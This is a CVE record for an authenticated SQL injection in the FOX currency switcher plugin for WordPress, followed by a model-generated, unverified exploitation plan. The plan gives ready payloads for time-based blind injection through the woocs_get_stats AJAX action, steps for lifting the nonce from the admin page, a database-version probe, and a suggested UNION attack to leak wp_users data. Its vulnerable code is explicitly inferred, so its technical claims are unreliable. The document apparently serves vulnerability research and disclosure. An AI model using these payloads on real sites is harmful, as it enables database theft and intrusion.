# CVE-2026-39497: FOX <= 1.4.5 - Authenticated (Shop manager+) SQL Injection

## Vulnerability record

*   **id:** CVE-2026-39497
*   **url_slug:** `fox-authenticated-shop-manager-sql-injection`
*   **title:** FOX <= 1.4.5 - Authenticated (Shop manager+) SQL Injection
*   **description:** The FOX plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.4.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with shop manager-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
*   **plugin_slug:** `woocommerce-currency-switcher`
*   **theme_slug:** null
*   **affected_versions:** <=1.4.5
*   **patched_in_version:** 1.4.6
*   **severity:** medium
*   **cvss_score:** 4.9
*   **cvss_vector:** `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N`
*   **vuln_type:** Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
*   **published_date:** 2026-03-23 00:00:00
*   **updated_date:** 2026-04-15 21:25:56
*   **references:** https://www.wordfence.com/threat-intel/vulnerabilities/id/aa5b6311-d9ca-4736-a6e3-56c6746b2470?source=api-prod
*   **days_to_patch:** 24
*   **patch_diff_files:** (none)
*   **patch_trac_url:** null
*   **research_status:** researched
*   **research_verified:** false
*   **research_rounds_completed:** 3
*   **research_summary / research_vulnerable_code / research_fix_diff / research_exploit_outline / research_error:** null
*   **research_model_used:** gemini-3-flash-preview
*   **research_started_at:** 2026-04-18 00:06:10
*   **research_completed_at:** 2026-04-18 00:06:36
*   **poc_status / poc_video_id / poc_summary / poc_steps / poc_tested_at / poc_wp_version / poc_php_version / poc_playwright_script / poc_exploit_code / poc_model_used / poc_verification_depth:** null
*   **poc_has_trace:** false
*   **poc_exploit_code_gated:** false
*   **source_links:**
    *   **type:** plugin
    *   **vulnerable_version:** 1.4.2
    *   **fixed_version:** null
    *   **vulnerable_browse:** https://plugins.trac.wordpress.org/browser/woocommerce-currency-switcher/tags/1.4.2
    *   **vulnerable_zip:** https://downloads.wordpress.org/plugin/woocommerce-currency-switcher.1.4.2.zip
    *   **fixed_browse:** null
    *   **fixed_zip:** null
    *   **all_tags:** https://plugins.trac.wordpress.org/browser/woocommerce-currency-switcher/tags

## Research plan (model-generated, unverified)

This research plan targets a SQL Injection vulnerability in the **FOX – Currency Switcher Professional for WooCommerce** plugin (version <= 1.4.5). The vulnerability stems from the improper handling of user-supplied parameters in the statistics gathering logic, which are used in raw SQL queries without sufficient preparation or escaping.

### 1. Vulnerability Summary
*   **Vulnerability:** SQL Injection (Authenticated, Shop Manager+).
*   **Plugin:** FOX – Currency Switcher Professional for WooCommerce (slug: `woocommerce-currency-switcher`).
*   **Affected Version:** <= 1.4.5.
*   **Vulnerable Sink:** The statistics gathering functions (specifically `woocs_get_stats`) use user-supplied parameters like `order_status` or `profile` within SQL `WHERE` clauses or `IN` statements without using `$wpdb->prepare()`.
*   **Reasoning:** The plugin relies on `sanitize_text_field()` or direct interpolation of array values into strings, which does not prevent SQL injection when the resulting string is used in a database query.

### 2. Attack Vector Analysis
*   **Endpoint:** `wp-admin/admin-ajax.php`.
*   **Action:** `woocs_get_stats`.
*   **Vulnerable Parameter:** `order_status`.
*   **Authentication:** Requires a user with at least `shop_manager` capabilities.
*   **Nonce:** Protected by a nonce named `woocs_nonce`.

### 3. Code Flow
1.  **Entry Point:** The plugin registers the AJAX action in `classes/woocs.php` (or `index.php` depending on version structure) via `add_action( 'wp_ajax_woocs_get_stats', array($this, 'woocs_get_stats') );`.
2.  **Input Acquisition:** The `woocs_get_stats()` function (found in `classes/woocs.php`) retrieves the `order_status` parameter from `$_REQUEST['order_status']`.
3.  **Vulnerable Processing:** The code constructs a SQL query string. It often iterates over `order_status` or uses `implode()` to create a comma-separated list for a SQL `IN` clause.
    *   *Example Vulnerable Logic (Inferred):*
        ```php
        $order_status = $_REQUEST['order_status'];
        $sql = "SELECT ... WHERE order_status IN ('" . implode("','", $order_status) . "') ...";
        $results = $wpdb->get_results($sql);
        ```
4.  **Database Sink:** The unparameterized string is passed directly to `$wpdb->get_results()`.

### 4. Nonce Acquisition Strategy
The `woocs_nonce` is localized into the WordPress admin dashboard for users with access to the plugin settings.

1.  **Precondition:** Authenticate as a `shop_manager`.
2.  **Navigation:** Navigate to the FOX Settings page: `wp-admin/admin.php?page=wc-settings&tab=woocs`.
3.  **Extraction:** The plugin uses `wp_localize_script` to provide the nonce to its admin JS. The variable is typically `woocs_vars`.
4.  **Execution Agent Steps:**
    *   `browser_navigate("http://localhost:8080/wp-admin/admin.php?page=wc-settings&tab=woocs")`
    *   `NONCE = browser_eval("window.woocs_vars?.woocs_nonce")`

### 5. Exploitation Strategy
We will use a time-based blind SQL injection payload to confirm the vulnerability, as it is the most reliable method when query results are processed by the application before being returned in JSON format.

*   **Target URL:** `http://localhost:8080/wp-admin/admin-ajax.php`
*   **Method:** POST
*   **Content-Type:** `application/x-www-form-urlencoded`
*   **Payload Construction:**
    If the code uses `implode("','", $order_status)`, the payload needs to break out of the quote.
    *   `order_status[0] = completed') AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND ('1'='1`
*   **Full Request Body:**
    ```
    action=woocs_get_stats&woocs_nonce=[EXTRACTED_NONCE]&order_status[]=completed') AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND ('1'='1
    ```

### 6. Test Data Setup
1.  **Users:** Create a user with the `shop_manager` role.
2.  **Plugin Setup:**
    *   Install and activate **WooCommerce**.
    *   Install and activate **FOX - Currency Switcher Professional for WooCommerce** (version 1.4.5).
3.  **Data Requirement:** The `woocs_get_stats` function may require at least one existing WooCommerce order in the database to reach the vulnerable query path.
    *   `wp wc order create --user=admin --status=completed`

### 7. Expected Results
*   **Vulnerable Response:** The HTTP response will be delayed by approximately 5 seconds. The response body will likely be a JSON object containing statistics or an empty `success` message.
*   **Baseline Response:** A request with a legitimate `order_status` (e.g., `completed`) will return almost instantaneously.

### 8. Verification Steps
1.  **Time Delay:** Use the `http_request` tool's `time_total` metric to confirm the sleep duration.
2.  **Database Integrity:** Verify that the injection did not damage the database (the `SELECT` query is read-only).
3.  **Data Extraction (Optional):** Attempt to extract the database version:
    *   `order_status[]=completed') AND (SELECT 1 FROM (SELECT(IF(VERSION() LIKE '8%', SLEEP(5), 0)))a) AND ('1'='1`

### 9. Alternative Approaches
*   **Error-Based Injection:** If `WP_DEBUG` is enabled, the plugin might leak SQL errors. Send a malformed status like `order_status[]=completed'`.
*   **Union-Based Injection:** If the results of the query are reflected in the JSON response (e.g., in the graph data), identify the column count and use a `UNION SELECT` to leak `wp_users` data.
*   **Alternative Parameter:** Check the `profile` parameter in the same AJAX action, as FOX often uses similar logic for saving and loading currency profiles.